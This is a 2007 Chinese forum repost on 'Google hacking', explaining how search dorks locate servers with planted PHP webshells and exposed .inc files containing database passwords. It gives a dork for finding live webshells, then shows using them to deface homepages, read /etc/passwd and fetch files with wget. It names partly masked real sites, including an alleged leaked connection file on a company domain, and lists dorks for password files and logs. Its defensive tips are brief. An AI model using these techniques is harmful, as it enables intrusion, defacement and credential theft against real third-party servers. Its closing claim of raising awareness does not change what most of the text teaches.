忘记密码
 新成员注册
查看: 830|回复: 0

[转帖]利用Google进行入侵的原理

[复制链接]
我的人缘0
发起活动
0 次
参加活动
0 次
龙能跃 发表于 2007-6-19 20:21 | 显示全部楼层 |阅读模式

你还没有登录,登录后可以看到更多精彩内容

您需要 登录 才可以下载或查看,没有账号?新成员注册

×

2004年在拉斯维加斯举行的blackhat大会上,有两位安全专家分别作了名为you found that on google? 和google attacks 的主题演讲。经过安全焦点论坛原版主wlj翻译整理后,个人觉得有必要补充完善一些细节部分。今天向大家讲述的是google的又一功能:利用搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,甚至可以直接进行傻瓜入侵。
  用google来进行“渗透测试”

  我们今天渗透测试人员在实施攻击之前,往往会先进行信息搜集工作,而后才是漏洞确认和最终的漏洞利用、扩大战果。在这里我们现在要谈的是:

  一、利用google查找被人安装了php webshell后门的主机,并测试能否使用;

  二、利用google查找暴露出来的inc敏感信息.

  ok,现在我们开始:

  1.查找利用php webshell

  我们在google的搜索框中填入:

  code:
intitle:"php shell*" "enable stderr" filetype:php

  (注: intitle—网页标题  enable stderr—unix标准输出和标准错误的缩写filetype—文件类型)。搜索结果中,你能找到很多直接在机器上执行命令的web shell来。如果找到的phpshell不会利用,如果你不熟悉unix,可以直接看看list,这里就不详细说了,有很多利用价值。要说明的是,我们这里搜索出来的一些国外的phpshell上都要使用unix命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填写搜索的内容不同)。通过我的检测,这个phpwebshell是可以直接echo(unix常用命令)。一句话就把首页搞定了:

  code:
echo "召唤" > index.jsp

  在得到的

  code:
echo \

后再写上:"召唤"

现在看看首页,已经被我们改成: "召唤" 了。

  我们也可以用wget上传一个文件上去(比如你要替换的叶子吧)。然后execute command输入 cat file > index.html or echo "" > file

echo "test" >> file

这样一条条打出来,站点首页就成功被替换了。同样的也可以

  code:
uname -a;cat /etc/passwd

不过有点要注意,有些webshell程序有问题,执行不了的,比如:
http://***www.al3toof.com/card/smal ... c_html&command=
http://***ramsgaard.net/upload/shell.php

这些站的php是global register off  


解决方案:


  我们可以利用相关工具进行在互联网进行搜索,如果有信息被滥用,到http://***www.google.com/remove.html提交你希望删除的信息,控制搜索引擎机器人的查询.

  2.搜索inc敏感信息

  我们在google的搜索框中填入:

  code:
.org filetype:inc

  我们现在搜索的是org域名的站点的inc信息(因为google屏蔽掉了搜索"com"信息,我们还可以搜其他gov,cn,info,tw,jp,edu等等之类的)

  ps:我在看许多php编程人员在编程时候,都喜欢把一些常写的代码或配置信息,写在一个.inc的文件中,如shared.inc、global.inc、conn.inc等等,当然这是一个很好的习惯,包括php官方网站都是如此,但不知你有没有注意到这里面含一个安全隐患问题。我有一次在写一个php代码时,无意中写错了一句话,当我在浏览器里查看此php文件时,竟然发现屏幕详细的显示了我所出错的php文件路径及代码行。(php错误显示配置是开着的.此功能在php里是默认的 ),这就是说当我们无意写错代码(同样.inc文件也一样) 或者php代码解析出问题时,而php错误显示又是开着的,客户端的用户就会看到具体url地址的.inc文件,而.url文件如同txt文本一样,当在浏览器中浏览时,就毫无保留地显示了它的内容,而且不少站点在.inc文件写了重要的信息如用户密码之类 包括国内著名海尔公司以及嘉铃摩托公司,我之所以敢公布是因为我本人测试过,http://***www.haier.com/su ***/inc/conn.inc 暴出的数据库id密码用客户端连不上去,网站关闭了1215,而且防火墙也过滤掉了。

  inc的知识说完后,我们继续又搜索到了好多,找到一个暴露了mysql口令的,我们又可以用客户端登陆上去修改数据了。这里涉及到数据库的知识,我们不谈太多,关于"inc暴露敏感信息"就到这里结束吧;当然我们可以通过一些办法解决:

  1,你可以专门对.inc文件进行配置,避免用户直接获取源文件。

  2,当然比较好的方法是,加上并且改文件扩展名为.php(php可以解析的扩展名),这样客户端就不会获取源文件了。

  这里,我将freemind绘制的图片用文本表示了。
  有关google hack的详细信息,帮助我们分析踩点
  连接符:


  code:
+      -       :         .        *         │

  操作符:

  code:
"foo1 foo2"  
filetype:123  
site:foo.com   
intext:foo  
intitle:footitle   
allinurl:foo


密码相关


  code:
:“index of”
htpasswd / passwd     
filetype:xls username password email   
"ws_ftp.log"     
  "config.php"   
allinurl:admin mdb  
service filetype:pwd (frontpage)   

  敏感信息:

  code:
"robots.tx"
"disallow:"
filetype:txt
  inurl:_vti_cnf (frontpage files)
allinurl:/msadc/samples/selector/showcode.asp
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:phpsysinfo
ipsec filetype:conf
intitle:"error occurred" odbc request where (select│insert)
"mydomain.com" nessus  report
"report generated by"  

  结尾:

  如果要拿root权限就要具体问题具体分析了,不过有了shell权限就好提了,网上有很多根据webshell提升权限的文章大家可以参照一下。

  通过google我们还可以搜索到很多有用的东西,不过是细节,要通过信息收集慢慢分析、扩大、进行入侵.这些我就不具体分析了。给大家个思路,大家慢慢研究好了到这里,这篇文章就要结束了,写这篇文章的目的是为了引起大家的关注与重视,了解新的hack手段,了解新的防护方法,事物都有两面性,在当今google盛行的时代,在充分利用google的同时.也应该看得更全面。
充实自我,展现自我!没有完美的个人,只有优秀的团队!计协我的家,建设靠大家!只有真正的融入了,你才会体会快乐哦~
您需要登录后才可以回帖 登录 | 新成员注册

本版积分规则

QQ|手机版|CA之家 ( 桂ICP备07006672号-6 )

GMT+8, 2025-9-20 00:23

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表